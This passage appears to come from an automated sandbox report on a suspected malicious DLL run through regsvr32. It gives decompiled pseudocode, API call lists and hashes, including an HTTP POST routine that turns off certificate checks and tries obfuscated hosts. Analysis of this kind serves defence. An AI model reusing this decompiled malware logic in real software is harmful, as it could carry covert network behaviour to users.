										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                            0x1000db45
                            0x1000db4b
                            0x1000db52
                            0x1000db55
                            0x1000db58
                            0x1000db5d
                            0x1000db5f
                            0x1000db64
                            0x1000dfac
                            0x1000dfac
                            0x1000db71
                            0x1000db73
                            0x1000db76
                            0x1000db79
                            0x1000df91
                            0x1000df97
                            0x1000dfa1
                            0x00000000
                            0x1000dfa6
                            0x1000db84
                            0x1000db8b
                            0x1000db92
                            0x1000db95
                            0x1000db9a
                            0x1000db9c
                            0x1000db9f
                            0x1000dba2
                            0x1000dba3
                            0x1000dbac
                            0x1000dbb2
                            0x1000dbb5
                            0x1000dbbe
                            0x1000dbc3
                            0x1000dbc8
                            0x1000dbdf
                            0x1000dbec
                            0x1000dbef
                            0x1000dbf6
                            0x1000dbfb
                            0x1000dc02
                            0x1000dc07
                            0x1000dc0e
                            0x1000dc10
                            0x1000dc1c
                            0x1000dc1f
                            0x1000dc21
                            0x1000df81
                            0x1000df82
                            0x1000df8b
                            0x00000000
                            0x1000df8b
                            0x1000dc27
                            0x1000dc2a
                            0x1000dc2d
                            0x1000dc30
                            0x1000dc32
                            0x1000df4d
                            0x1000df50
                            0x1000df53
                            0x1000df55
                            0x1000df77
                            0x1000df7c
                            0x1000df57
                            0x1000df5a
                            0x1000df65
                            0x1000df6c
                            0x1000df6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000dc38
                            0x1000dc38
                            0x1000dc4a
                            0x1000dc4d
                            0x1000dc4f
                            0x00000000
                            0x00000000
                            0x1000dc57
                            0x1000dc5a
                            0x1000dc5d
                            0x1000dc60
                            0x1000dc63
                            0x1000dc66
                            0x00000000
                            0x00000000
                            0x1000dc6c
                            0x1000dc7a
                            0x1000dc7d
                            0x1000dc7f
                            0x1000dc98
                            0x1000dca7
                            0x1000dcaf
                            0x1000dcaf
                            0x1000dcb2
                            0x1000dcb9
                            0x1000dcbd
                            0x1000dcc3
                            0x1000dcc5
                            0x1000df35
                            0x1000df3b
                            0x1000df41
                            0x1000df44
                            0x1000df44
                            0x00000000
                            0x1000df44
                            0x1000dcd4
                            0x1000dce8
                            0x1000dcec
                            0x1000dcee
                            0x1000dcf3
                            0x1000df02
                            0x1000df08
                            0x1000df13
                            0x1000df1e
                            0x1000df24
                            0x1000df2a
                            0x1000df2d
                            0x00000000
                            0x1000df2d
                            0x1000dcf9
                            0x1000ded0
                            0x1000ded0
                            0x1000ded3
                            0x1000ded6
                            0x00000000
                            0x00000000
                            0x1000dd01
                            0x1000dd09
                            0x1000dd10
                            0x1000dd16
                            0x1000dd18
                            0x00000000
                            0x00000000
                            0x1000dd21
                            0x1000dd36
                            0x1000dd3c
                            0x1000dd45
                            0x1000dd48
                            0x1000dd4b
                            0x1000dd4d
                            0x1000dec3
                            0x1000dec6
                            0x1000decf
                            0x1000decf
                            0x00000000
                            0x1000decf
                            0x1000dd5d
                            0x1000dd60
                            0x1000dd67
                            0x1000dd6d
                            0x1000dd70
                            0x1000dd73
                            0x1000dd76
                            0x1000dd79
                            0x1000ddb5
                            0x1000ddb5
                            0x1000ddb8
                            0x1000de64
                            0x1000de78
                            0x1000de88
                            0x1000de8c
                            0x1000de8e
                            0x1000dea5
                            0x1000dea9
                            0x1000deb2
                            0x1000debd
                            0x00000000
                            0x1000debd
                            0x1000de94
                            0x1000de95
                            0x1000de9a
                            0x1000de9a
                            0x1000de9c
                            0x1000de9d
                            0x1000dea2
                            0x00000000
                            0x1000dea2
                            0x1000ddbe
                            0x1000ddbe
                            0x1000ddc1
                            0x1000de2c
                            0x1000de40
                            0x1000de50
                            0x1000de54
                            0x1000de56
                            0x00000000
                            0x00000000
                            0x1000de5c
                            0x1000de5d
                            0x00000000
                            0x1000de5d
                            0x1000ddc3
                            0x1000ddc3
                            0x1000ddc6
                            0x00000000
                            0x00000000
                            0x1000ddc8
                            0x1000ddcb
                            0x00000000
                            0x00000000
                            0x1000ddcd
                            0x1000ddcd
                            0x1000ddd3
                            0x1000ddef
                            0x1000ddfe
                            0x1000de07
                            0x1000de0c
                            0x1000de0f
                            0x1000de15
                            0x1000de15
                            0x1000de1a
                            0x1000de26
                            0x00000000
                            0x1000de26
                            0x1000ddd8
                            0x00000000
                            0x1000ddd8
                            0x1000dd7b
                            0x1000dda2
                            0x1000dda7
                            0x1000ddac
                            0x1000ddae
                            0x1000ddae
                            0x00000000
                            0x1000ddac
                            0x1000dd7d
                            0x1000dd7d
                            0x1000dd80
                            0x00000000
                            0x00000000
                            0x1000dd86
                            0x1000dd86
                            0x1000dd89
                            0x00000000
                            0x00000000
                            0x1000dd8f
                            0x1000dd8f
                            0x1000dd92
                            0x00000000
                            0x00000000
                            0x1000dd98
                            0x1000dd9b
                            0x00000000
                            0x00000000
                            0x1000dd9d
                            0x00000000
                            0x1000dd9d
                            0x1000dedf
                            0x1000dee5
                            0x1000deeb
                            0x1000deee
                            0x1000def1
                            0x1000def1
                            0x1000def4
                            0x1000def5
                            0x1000def8
                            0x1000defa
                            0x00000000
                            0x00000000
                            0x1000df4a
                            0x1000df4a
                            0x00000000
                            0x1000df4a
                            0x1000dc81
                            0x1000dc87
                            0x00000000
                            0x1000dc87
                            0x1000df47
                            0x00000000
                            0x1000dbca
                            0x1000dbcf
                            0x1000dbd4
                            0x00000000
                            0x1000dbd8

                            APIs
                              • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                              • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                              • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                              • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                              • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                            • SysFreeString.OLEAUT32(?), ref: 1000DF82
                            • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 224402418-1412513891
                            • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                            • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                            0x1000e671
                            0x1000e683
                            0x1000e68c
                            0x1000e696
                            0x1000e69a
                            0x1000e6ab
                            0x1000e6c2
                            0x1000e6cf
                            0x1000e6dc
                            0x1000e6e9
                            0x1000e6ec
                            0x1000e6f1
                            0x1000e6f6
                            0x1000e6f8
                            0x1000e700
                            0x1000e70b
                            0x1000e712
                            0x1000e71e
                            0x1000e721
                            0x1000e72f
                            0x1000e732
                            0x1000e738
                            0x1000e739
                            0x1000e73b
                            0x1000e744
                            0x1000e745
                            0x1000e74a
                            0x1000e750
                            0x1000e75a
                            0x1000e75c
                            0x1000e761
                            0x1000e761
                            0x1000e770
                            0x1000e77f
                            0x1000e783
                            0x1000e792
                            0x1000e795
                            0x1000e79a
                            0x1000e79e
                            0x1000e7a5
                            0x1000e7ac
                            0x1000e7b4
                            0x1000e7bc
                            0x1000e7c3
                            0x1000e7cb
                            0x1000e7d3
                            0x1000e7da
                            0x1000e7e2
                            0x1000e7ea
                            0x1000e7ff
                            0x1000e80c
                            0x1000e80e
                            0x1000e813
                            0x1000e813
                            0x1000e81a
                            0x1000e82b
                            0x1000e830
                            0x1000e832
                            0x1000e832
                            0x1000e846
                            0x1000e858
                            0x1000e85a
                            0x1000e85d
                            0x1000e862
                            0x1000e862
                            0x1000e869
                            0x1000e878
                            0x1000e87c
                            0x1000e8ba
                            0x1000e8bf
                            0x1000e8c7
                            0x1000e8cc
                            0x1000e8d7
                            0x1000e8dd
                            0x1000e8e7
                            0x1000e8ea
                            0x1000e8f3
                            0x1000e8f8
                            0x1000e8f8
                            0x1000e901
                            0x1000e94a
                            0x1000e94c
                            0x1000e953
                            0x1000e954
                            0x1000e957
                            0x1000e95d
                            0x1000e961
                            0x1000e962
                            0x1000e967
                            0x1000e969
                            0x1000e96f
                            0x1000e984
                            0x1000e98c
                            0x1000e9c1
                            0x1000e9c6
                            0x1000e9cb
                            0x00000000
                            0x1000e9cd
                            0x1000e98e
                            0x1000e990
                            0x1000e990
                            0x1000e999
                            0x1000e99c
                            0x1000e99e
                            0x1000e9a0
                            0x1000e9a6
                            0x1000e9a6
                            0x1000e9ab
                            0x1000e9ad
                            0x1000e9b4
                            0x1000e9b4
                            0x00000000
                            0x1000e9b7
                            0x1000e971
                            0x1000e979
                            0x00000000
                            0x1000e903
                            0x1000e903
                            0x1000e909
                            0x1000e90f
                            0x1000e912
                            0x00000000
                            0x1000e912
                            0x1000e901
                            0x1000e87e
                            0x1000e884
                            0x1000e888
                            0x1000e889
                            0x1000e88e
                            0x1000e890
                            0x1000e896
                            0x1000e8b4
                            0x1000e8b4
                            0x00000000
                            0x1000e8b4
                            0x1000e898
                            0x1000e8a2
                            0x1000e8a4
                            0x1000e8a5
                            0x1000e8aa
                            0x1000e8ac
                            0x1000e8b2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e86b
                            0x1000e86b
                            0x1000e914
                            0x1000e914
                            0x1000e91a
                            0x1000e91d
                            0x00000000
                            0x1000e91d
                            0x1000e81c
                            0x1000e81c
                            0x1000e91f
                            0x1000e91f
                            0x1000e925
                            0x1000e928
                            0x00000000
                            0x1000e928
                            0x1000e81a
                            0x1000e785
                            0x1000e92a
                            0x1000e92d
                            0x1000e92f
                            0x1000e932
                            0x1000e935
                            0x1000e93e
                            0x1000e943
                            0x00000000
                            0x00000000
                            0x1000e947
                            0x00000000
                            0x1000e947
                            0x1000e754
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                            • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                            0x100116c1
                            0x100116c8
                            0x100116d1
                            0x100116d5
                            0x10011750
                            0x00000000
                            0x10011752
                            0x100116e3
                            0x100116e5
                            0x100116ea
                            0x00000000
                            0x00000000
                            0x100116f2
                            0x100116f4
                            0x100116f9
                            0x00000000
                            0x00000000
                            0x10011703
                            0x10011707
                            0x00000000
                            0x00000000
                            0x10011709
                            0x1001170e
                            0x10011710
                            0x10011711
                            0x10011715
                            0x1001171b
                            0x00000000
                            0x00000000
                            0x10011726
                            0x1001172f
                            0x10011733
                            0x00000000
                            0x00000000
                            0x10011735
                            0x10011737
                            0x1001173f
                            0x10011741
                            0x10011742
                            0x1001174a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                            • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                            0x10012125
                            0x1001212a
                            0x1001212e
                            0x1001212e
                            0x10012133
                            0x10012138
                            0x10012139
                            0x1001213c
                            0x1001213d
                            0x10012142
                            0x10012145
                            0x10012146
                            0x1001214b
                            0x10012152
                            0x100121f8
                            0x100121f8
                            0x00000000
                            0x10012161
                            0x10012161
                            0x10012168
                            0x1001216c
                            0x10012173
                            0x1001217c
                            0x1001217e
                            0x1001217e
                            0x1001217c
                            0x1001218d
                            0x100121b3
                            0x100121bc
                            0x100121be
                            0x100121c4
                            0x100121f3
                            0x100121f3
                            0x100121fb
                            0x100121fe
                            0x100121fe
                            0x100121c6
                            0x100121c7
                            0x100121cd
                            0x100121cf
                            0x100121cf
                            0x100121d4
                            0x100121d3
                            0x100121d3
                            0x100121db
                            0x100121e7
                            0x100121f1
                            0x100121f1
                            0x00000000
                            0x1001219d
                            0x1001219d
                            0x1001219d
                            0x100121a3
                            0x00000000
                            0x00000000
                            0x100121a5
                            0x100121ab
                            0x100121b0
                            0x00000000
                            0x100121b0
                            0x1001218d

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                            • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                            • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
